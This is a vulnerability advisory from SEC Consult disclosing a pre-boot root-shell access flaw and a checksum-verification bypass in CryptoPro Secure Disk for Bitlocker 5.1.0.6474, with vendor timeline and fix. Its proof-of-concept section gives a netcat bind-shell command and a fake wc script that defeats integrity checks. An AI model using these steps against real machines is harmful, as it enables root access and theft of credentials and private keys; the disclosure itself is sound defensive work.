CryptWare CryptoPro Secure Disk For Bitlocker 5.1.0.6474 Manipulation

`SEC Consult Vulnerability Lab Security Advisory < 20160831-0 >  
=======================================================================  
title: Manipulation of pre-boot authentication  
product: CryptWare CryptoPro Secure Disk for Bitlocker  
vulnerable version: 5.1.0.6474  
fixed version: 5.2.1  
CVE number: -  
impact: critical  
homepage: http://www.cryptware.eu  
found: 2016-06-30  
by: R. Freingruber (Office Vienna)  
M. von Dach (Office Zurich)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Bangkok - Berlin - Linz - Montreal - Moscow  
Singapore - Vienna (HQ) - Vilnius - Zurich  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"CryptoPro Secure Disk for BitLocker enhances the functionality of  
Microsoft BitLocker to have an own PreBoot Authentification (PBA)  
and enables BitLocker to use established and existing authentication  
methods like UID/Password and Smartcard/PIN. The encryption  
of the hard disk, as well as the recovery mechanism are realized with  
Microsoft BitLocker while the user Authentication and Help-Desk  
mechanism are handled by CryptoPro Secure Disk for Bitlocker.  
  
This ideal combination of both technologies allows customers to  
establish an ease of use and cost effective solution, even without  
have to use TPM authentication and administration. Our centralized  
encryption management with different roles of administration and  
multi-client-capability delivers new opportunities for customers and  
third party service providers."  
  
Source:  
http://files.cryptware.eu/200000369-9fec6a1e00/CryptWare_Datenblatt_Secure_Disk_for_BitLocker_EN.pdf  
  
  
Business recommendation:  
------------------------  
By using the vulnerabilities documented in this advisory an attacker  
can attack the boot process and backdoor the system to steal  
login credentials, the private 802.1x certificate and the associated  
password.  
  
SEC Consult recommends not to use this software until a thorough security  
review has been performed by security professionals and all identified  
issues have been resolved.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Terminal access not blocked at login mask  
After installing CryptoPro Secure Disk an additional partition (ext3) is  
added to the system. This partition contains a small linux operating system  
and gets directly started after booting the system (before bitlocker code  
gets executed). Via an init script the login application is started.  
An attacker can use a keyboard shortcut to open the first terminal.  
This spawns an invisible root shell for the attacker (commands can be  
executed, however, the output is not directly visible).  
The other terminals (terminal two to six) are blocked via commands  
inside the /etc/inittab file. The associated line for terminal one is  
uncommented and therefore not active.  
  
  
2) Inadequate software manipulation verification  
After starting the system the following application gets started:  
/usr/SUPERSHEEP/bin/app_launcher -a ./ss_gui  
The app_launcher application carries out checks and finally  
starts the graphical user interface with the login mask (ss_gui).  
These checks first verify the hashsum of the file  
/usr/SUPERSHEEP/bin/verify_checksums.sh  
and afterwards execute the script. The script calculates the hashsum  
of nearly all files on the system and compares them with a preconfigured  
list (which is stored inside an encrypted block special file).  
If the hash of the script is wrong or the script reports invalid hashes,  
the boot process is stopped and an error is displayed to the user.  
The script contains a design / logical error which allows an attacker  
to bypass the hash verification. By exploiting this flaw an attacker  
can modify all files on the system (e.g. add a backdoor).  
  
  
Proof of concept:  
-----------------  
1) Terminal access not blocked at login mask  
An attacker can use the keyboard shortcut ctrl+alt+f1 to open an  
invisible root shell. A simple proof-of-concept is to type the  
command "reboot". This results in a beep-sound and a reboot of the  
system.  
Another proof-of-concept is that an attacker connects the victim  
system with a DHCP server to assign an IP address and then start the  
following command:  
/usr/bin/netcat -lvvp 8197 -e /bin/sh  
  
This command must be typed with a german keyboard layout. It  
binds a root shell to the port 8197. Afterwards the attacker can  
connect to port 8197 to issue commands and receive the output of it.  
  
  
2) Inadequate software manipulation verification  
The script /usr/SUPERSHEEP/bin/verify_checksums.sh  
executes the following command to calculate the number of files with  
invalid hashes:  
/tmp/sha256sum -c $CS_FILE > $CS_FILE.out  
Later the wc (word count) utility is used to count the number of  
errors. This is done by the following code:  
NUM_FAILED=`wc -l $CS_FILE.error | cut -d " " -f 1`  
The script uses the wc program and expects that wc was not  
modified and the output of it is correct. However, an attacker  
can modify it to always return zero which means that zero errors  
where found.  
The problem is that the script verify_checksums.sh verifies the  
hashsum of the wc utility but during verification it already uses  
this utilitiy for this verification check.  
  
For a proof-of-concept the wc file was replaced with the following content:  
#!/bin/sh  
echo a0 xa  
exit 0  
  
After that all scripts and binaries can be modified.  
For example, the following script from CryptoPro Secure Disk can be used to  
backdoor the system to save private keys (802.1x) together with the  
associated password:  
/usr/SUPERSHEEP/extract_certificates.sh  
  
  
Vulnerable / tested versions:  
-----------------------------  
The version 5.1.0.6474 was found to be vulnerable which was the latest version  
at the time of discovery.  
  
  
Vendor contact timeline:  
------------------------  
2016-08-01: Contacting vendor through [email protected]  
2016-08-02: CryptWare was able to reproduce the vulnerabilities  
2016-08-10: Release of CryptoPro Secure Disk 5.2.1 which  
according to the vendor fixes the vulnerabilities.  
2016-08-31: Coordinated release of security advisory  
  
  
Solution:  
---------  
Upgrade to CryptoPro Secure Disk 5.2.1. The patch is provided  
by the vendor directly.  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Bangkok - Berlin - Linz - Montreal - Moscow  
Singapore - Vienna (HQ) - Vilnius - Zurich  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/Career.htm  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF R. Freingruber / @2016  
  
`